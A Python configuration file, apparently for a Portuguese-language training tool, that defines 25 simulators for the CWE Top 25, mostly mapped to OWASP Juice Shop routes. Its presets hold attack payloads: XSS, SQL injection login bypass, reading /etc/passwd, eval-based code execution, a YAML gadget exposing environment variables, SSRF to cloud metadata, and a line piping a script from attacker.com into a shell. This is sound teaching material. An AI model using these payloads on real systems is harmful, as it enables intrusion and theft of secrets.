# 25 simuladores — 1 por CWE TOP 25 MITRE 2025 (Juice Shop + cenários educativos)

def _cwe_kind(cwe_id):
    return "c" + cwe_id.replace("CWE-", "")


CWE_SIMULATORS = [
  {"kind": _cwe_kind("CWE-79"), "cwe": "CWE-79", "rank": 1, "owasp": "A05",
   "title": "routes/track-order.ts · XSS refletido",
   "ide_file": "routes/track-order.ts",
   "input_id": "sim-c79", "input_type": "text",
   "input_value": "<iframe src=\"javascript:alert(1)\">",
   "input_aria": "payload xss", "presets": [("DOM XSS", "<iframe src=\"javascript:alert(1)\">"), ("Stored", "<script>alert(1)</script>")]},
  {"kind": _cwe_kind("CWE-89"), "cwe": "CWE-89", "rank": 2, "owasp": "A05",
   "title": "routes/login.ts · SQL Injection",
   "ide_file": "routes/login.ts",
   "input_id": "sim-c89", "input_type": "text", "input_value": "' OR 1=1--",
   "input_aria": "email", "presets": [("Bypass login", "' OR 1=1--")]},
  {"kind": _cwe_kind("CWE-352"), "cwe": "CWE-352", "rank": 3, "owasp": "A06",
   "title": "routes/wallet.ts · CSRF transferência",
   "ide_file": "routes/wallet.ts",
   "input_id": "sim-c352", "input_type": "number", "input_value": "500",
   "input_aria": "valor", "presets": [("PoC CSRF", "500")]},
  {"kind": _cwe_kind("CWE-862"), "cwe": "CWE-862", "rank": 4, "owasp": "A01",
   "title": "routes/scoreBoard.ts · Admin sem authZ",
   "ide_file": "routes/scoreBoard.ts",
   "input_id": "sim-c862", "input_type": "text", "input_value": "/api/Challenges",
   "input_aria": "endpoint", "presets": [("Score Board", "/api/Challenges")]},
  {"kind": _cwe_kind("CWE-787"), "cwe": "CWE-787", "rank": 5, "owasp": "A10",
   "title": "native/parser.c · OOB Write",
   "ide_file": "native/parser.c",
   "input_id": "sim-c787", "input_type": "text",
   "input_value": "A" * 64,
   "input_aria": "buffer payload", "presets": [("Overflow", "A" * 64)]},
  {"kind": _cwe_kind("CWE-22"), "cwe": "CWE-22", "rank": 6, "owasp": "A01",
   "title": "routes/fileServer.ts · Path Traversal",
   "ide_file": "routes/fileServer.ts",
   "input_id": "sim-c22", "input_type": "text", "input_value": "../../../etc/passwd",
   "input_aria": "path", "presets": [("LFI clássico", "../../../etc/passwd")]},
  {"kind": _cwe_kind("CWE-416"), "cwe": "CWE-416", "rank": 7, "owasp": "A10",
   "title": "native/decoder.c · Use After Free",
   "ide_file": "native/decoder.c",
   "input_id": "sim-c416", "input_type": "text", "input_value": "free-reuse-0xdeadbeef",
   "input_aria": "heap pattern", "presets": [("UAF PoC", "free-reuse-0xdeadbeef")]},
  {"kind": _cwe_kind("CWE-125"), "cwe": "CWE-125", "rank": 8, "owasp": "A10",
   "title": "native/tls.c · OOB Read (Heartbleed)",
   "ide_file": "native/tls.c",
   "input_id": "sim-c125", "input_type": "text", "input_value": "65535",
   "input_aria": "payload length", "presets": [("Heartbleed", "65535")]},
  {"kind": _cwe_kind("CWE-78"), "cwe": "CWE-78", "rank": 9, "owasp": "A05",
   "title": "routes/checkKeys.ts · OS Command Injection",
   "ide_file": "routes/checkKeys.ts",
   "input_id": "sim-c78", "input_type": "text", "input_value": "; cat /etc/passwd",
   "input_aria": "argumento", "presets": [("Shell metachar", "; cat /etc/passwd")]},
  {"kind": _cwe_kind("CWE-94"), "cwe": "CWE-94", "rank": 10, "owasp": "A05",
   "title": "routes/profile.ts · Code Injection (eval)",
   "ide_file": "routes/profile.ts",
   "input_id": "sim-c94", "input_type": "text", "input_value": "process.mainModule.require('child_process').execSync('id')",
   "input_aria": "código", "presets": [("eval RCE", "process.mainModule.require('child_process').execSync('id')")]},
  {"kind": _cwe_kind("CWE-120"), "cwe": "CWE-120", "rank": 11, "owasp": "A10",
   "title": "native/legacy.c · Classic Buffer Overflow",
   "ide_file": "native/legacy.c",
   "input_id": "sim-c120", "input_type": "text", "input_value": "B" * 128,
   "input_aria": "input", "presets": [("strcpy overflow", "B" * 128)]},
  {"kind": _cwe_kind("CWE-434"), "cwe": "CWE-434", "rank": 12, "owasp": "A01",
   "title": "routes/fileUpload.ts · Upload irrestrito",
   "ide_file": "routes/fileUpload.ts",
   "input_id": "sim-c434", "input_type": "text", "input_value": "shell.php.jpg",
   "input_aria": "filename", "presets": [("Double ext", "shell.php.jpg")]},
  {"kind": _cwe_kind("CWE-476"), "cwe": "CWE-476", "rank": 13, "owasp": "A10",
   "title": "native/handler.c · NULL Pointer Deref",
   "ide_file": "native/handler.c",
   "input_id": "sim-c476", "input_type": "text", "input_value": "null-deref-trigger",
   "input_aria": "trigger", "presets": [("NULL path", "null-deref-trigger")]},
  {"kind": _cwe_kind("CWE-121"), "cwe": "CWE-121", "rank": 14, "owasp": "A10",
   "title": "native/stack.c · Stack Buffer Overflow",
   "ide_file": "native/stack.c",
   "input_id": "sim-c121", "input_type": "text", "input_value": "C" * 256,
   "input_aria": "stack payload", "presets": [("ROP prep", "C" * 256)]},
  {"kind": _cwe_kind("CWE-502"), "cwe": "CWE-502", "rank": 15, "owasp": "A08",
   "title": "routes/fileUpload.ts · Deserialização YAML",
   "ide_file": "routes/fileUpload.ts",
   "input_id": "sim-c502", "input_type": "text",
   "input_value": "!!js/function >{ return process.env }",
   "input_aria": "yaml", "presets": [("YAML gadget", "!!js/function >{ return process.env }")]},
  {"kind": _cwe_kind("CWE-122"), "cwe": "CWE-122", "rank": 16, "owasp": "A10",
   "title": "native/heap.c · Heap Buffer Overflow",
   "ide_file": "native/heap.c",
   "input_id": "sim-c122", "input_type": "text", "input_value": "D" * 512,
   "input_aria": "heap payload", "presets": [("Heap spray", "D" * 512)]},
  {"kind": _cwe_kind("CWE-863"), "cwe": "CWE-863", "rank": 17, "owasp": "A01",
   "title": "routes/feedback.ts · Role check incorreto",
   "ide_file": "routes/feedback.ts",
   "input_id": "sim-c863", "input_type": "text", "input_value": "role=admin",
   "input_aria": "role param", "presets": [("Escalar role", "role=admin")]},
  {"kind": _cwe_kind("CWE-20"), "cwe": "CWE-20", "rank": 18, "owasp": "A05",
   "title": "routes/userRegistration.ts · Validação ausente",
   "ide_file": "routes/userRegistration.ts",
   "input_id": "sim-c20", "input_type": "text", "input_value": "not-an-email",
   "input_aria": "email", "presets": [("Email inválido", "not-an-email"), ("Qty -1", "-1")]},
  {"kind": _cwe_kind("CWE-284"), "cwe": "CWE-284", "rank": 19, "owasp": "A01",
   "title": "routes/userProfile.ts · ACL vazia",
   "ide_file": "routes/userProfile.ts",
   "input_id": "sim-c284", "input_type": "text", "input_value": "/rest/user/2",
   "input_aria": "recurso", "presets": [("Perfil alheio", "/rest/user/2")]},
  {"kind": _cwe_kind("CWE-200"), "cwe": "CWE-200", "rank": 20, "owasp": "A02",
   "title": "routes/accessLog.ts · Vazamento em logs",
   "ide_file": "routes/accessLog.ts",
   "input_id": "sim-c200", "input_type": "text", "input_value": "/support/logs",
   "input_aria": "path", "presets": [("Access log", "/support/logs")]},
  {"kind": _cwe_kind("CWE-306"), "cwe": "CWE-306", "rank": 21, "owasp": "A07",
   "title": "routes/admin.ts · Endpoint sem login",
   "ide_file": "routes/admin.ts",
   "input_id": "sim-c306", "input_type": "text",
   "input_value": "/rest/admin/application-configuration",
   "input_aria": "endpoint", "presets": [("Admin aberto", "/rest/admin/application-configuration")]},
  {"kind": _cwe_kind("CWE-918"), "cwe": "CWE-918", "rank": 22, "owasp": "A01",
   "title": "routes/redirect.ts · SSRF",
   "ide_file": "routes/redirect.ts",
   "input_id": "sim-c918", "input_type": "text",
   "input_value": "http://169.254.169.254/latest/meta-data/",
   "input_aria": "url", "presets": [("AWS metadata", "http://169.254.169.254/latest/meta-data/")]},
  {"kind": _cwe_kind("CWE-77"), "cwe": "CWE-77", "rank": 23, "owasp": "A05",
   "title": "routes/webhook.ts · Command Injection",
   "ide_file": "routes/webhook.ts",
   "input_id": "sim-c77", "input_type": "text", "input_value": "| curl attacker.com/shell.sh | sh",
   "input_aria": "webhook arg", "presets": [("Pipe shell", "| curl attacker.com/shell.sh | sh")]},
  {"kind": _cwe_kind("CWE-639"), "cwe": "CWE-639", "rank": 24, "owasp": "A01",
   "title": "routes/basket.ts · IDOR (user key)",
   "ide_file": "routes/basket.ts",
   "input_id": "sim-c639", "input_type": "number", "input_value": "3",
   "input_aria": "basket id", "presets": [("Basket alheio", "3")]},
  {"kind": _cwe_kind("CWE-770"), "cwe": "CWE-770", "rank": 25, "owasp": "A06",
   "title": "routes/login.ts · Sem rate limit",
   "ide_file": "routes/login.ts",
   "input_id": "sim-c770", "input_type": "number", "input_value": "50",
   "input_aria": "tentativas", "presets": [("Brute force", "50"), ("Spray", "200")]},
]

CWE_SIM_KINDS = [s["kind"] for s in CWE_SIMULATORS]
CWE_SIM_BY_CWE = {s["cwe"]: s["kind"] for s in CWE_SIMULATORS}